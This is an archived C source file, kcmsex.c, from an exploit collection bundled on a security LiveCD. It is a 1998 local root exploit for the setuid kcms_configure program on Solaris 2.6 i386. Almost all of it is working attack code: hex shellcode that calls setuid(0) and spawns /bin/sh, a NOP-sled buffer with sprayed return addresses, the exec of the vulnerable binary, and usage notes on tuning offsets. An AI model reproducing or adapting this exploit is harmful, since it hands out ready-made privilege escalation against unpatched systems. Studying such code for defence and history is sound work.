home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / local / kcmsex.c < prev    next >
Encoding:
C/C++ Source or Header  |  2005-02-12  |  3.9 KB  |  101 lines
  1. /**
  2. ***  kcmsex - i386 Solaris root exploit for /usr/openwin/bin/kcms_configure
  3. ***
  4. ***  Tested and confirmed under Solaris 2.6 i386
  5. ***
  6. ***  Usage:  % kcmsex [offset]
  7. ***
  8. ***  where offset (if present) is the number of bytes to add to the stack
  9. ***  pointer to calculate your target return address; try -1000 to 1000 in
  10. ***  increments of 100 for starters.  Thanks go to Sun for cranking out
  11. ***  such sloppy privileged code.  Keep those holes a coming, boys!
  12. ***
  13. ***  Cheez Whiz
  14. ***  cheezbeast@hotmail.com
  15. ***
  16. ***  December 17, 1998
  17. **/
  18.  
  19. #include <stdio.h>
  20. #include <stdlib.h>
  21. #include <string.h>
  22. #include <unistd.h>
  23.  
  24. #define BUFLEN 500
  25. #define NOP 0x90
  26.  
  27. char shell[] =
  28.   /*  0 */ "\xeb\x3b"                         /* jmp springboard [2000]*/
  29.   /* syscall:                                                    [2000]*/
  30.   /*  2 */ "\x9a\xff\xff\xff\xff\x07\xff"     /* lcall 0x7,0x0   [2000]*/
  31.   /*  9 */ "\xc3"                             /* ret             [2000]*/
  32.   /* start:                                                      [2000]*/
  33.   /* 10 */ "\x5e"                             /* popl %esi       [2000]*/
  34.   /* 11 */ "\x31\xc0"                         /* xor %eax,%eax   [2000]*/
  35.   /* 13 */ "\x89\x46\xc1"                     /* movl %eax,-0x3f(%esi) */
  36.   /* 16 */ "\x88\x46\xc6"                     /* movb %al,-0x3a(%esi)  */
  37.   /* 19 */ "\x88\x46\x07"                     /* movb %al,0x7(%esi)    */
  38.   /* 22 */ "\x89\x46\x0c"                     /* movl %eax,0xc(%esi)   */
  39.   /* setuid:                                                     [2000]*/
  40.   /* 25 */ "\x31\xc0"                         /* xor %eax,%eax   [2000]*/
  41.   /* 27 */ "\x50"                             /* pushl %eax      [2000]*/
  42.   /* 28 */ "\xb0\x17"                         /* movb $0x17,%al  [2000]*/
  43.   /* 30 */ "\xe8\xdf\xff\xff\xff"             /* call syscall    [2000]*/
  44.   /* 35 */ "\x83\xc4\x04"                     /* addl $0x4,%esp  [2000]*/
  45.   /* execve:                                                     [2000]*/
  46.   /* 38 */ "\x31\xc0"                         /* xor %eax,%eax   [2000]*/
  47.   /* 40 */ "\x50"                             /* pushl %eax      [2000]*/
  48.   /* 41 */ "\x8d\x5e\x08"                     /* leal 0x8(%esi),%ebx   */
  49.   /* 44 */ "\x53"                             /* pushl %ebx      [2000]*/
  50.   /* 45 */ "\x8d\x1e"                         /* leal (%esi),%ebx[2000]*/
  51.   /* 47 */ "\x89\x5e\x08"                     /* movl %ebx,0x8(%esi)   */
  52.   /* 50 */ "\x53"                             /* pushl %ebx      [2000]*/
  53.   /* 51 */ "\xb0\x3b"                         /* movb $0x3b,%al  [2000]*/
  54.   /* 53 */ "\xe8\xc8\xff\xff\xff"             /* call syscall    [2000]*/
  55.   /* 58 */ "\x83\xc4\x0c"                     /* addl $0xc,%esp  [2000]*/
  56.   /* springboard:                                                [2000]*/
  57.   /* 61 */ "\xe8\xc8\xff\xff\xff"             /* call start      [2000]*/
  58.   /* data:                                                       [2000]*/
  59.   /* 66 */ "\x2f\x62\x69\x6e\x2f\x73\x68\xff" /* DATA            [2000]*/
  60.   /* 74 */ "\xff\xff\xff\xff"                 /* DATA            [2000]*/
  61.   /* 78 */ "\xff\xff\xff\xff";                /* DATA            [2000]*/
  62.  
  63. char buf[BUFLEN];
  64. unsigned long int nop, esp;
  65. long int offset = 0;
  66.  
  67. unsigned long int
  68. get_esp()
  69. {
  70.   __asm__("movl %esp,%eax");
  71. }
  72.  
  73. void
  74. main (int argc, char *argv[])
  75. {
  76.   int i;
  77.  
  78.   if (argc > 1)
  79.     offset = strtol(argv[1], NULL, 0);
  80.  
  81.   if (argc > 2)
  82.     nop = strtoul(argv[2], NULL, 0);
  83.   else
  84.     nop = 285;
  85.  
  86.   esp = get_esp();
  87.  
  88.   memset(buf, NOP, BUFLEN);
  89.   memcpy(buf+nop, shell, strlen(shell));
  90.   for (i = nop+strlen(shell); i < BUFLEN-4; i += 4)
  91.     *((int *) &buf[i]) = esp+offset;
  92.  
  93.   printf("jumping to 0x%08x (0x%08x offset %d) [nop %d]\n",
  94.          esp+offset, esp, offset, nop);
  95.   execl("/usr/openwin/bin/kcms_configure", "kcms_configure", "-P", buf,
  96.         "foofoo", NULL);
  97.  
  98.   printf("exec failed!\n");
  99.   return;
  100. }
  101. /*                    www.hack.co.za              [2000]*/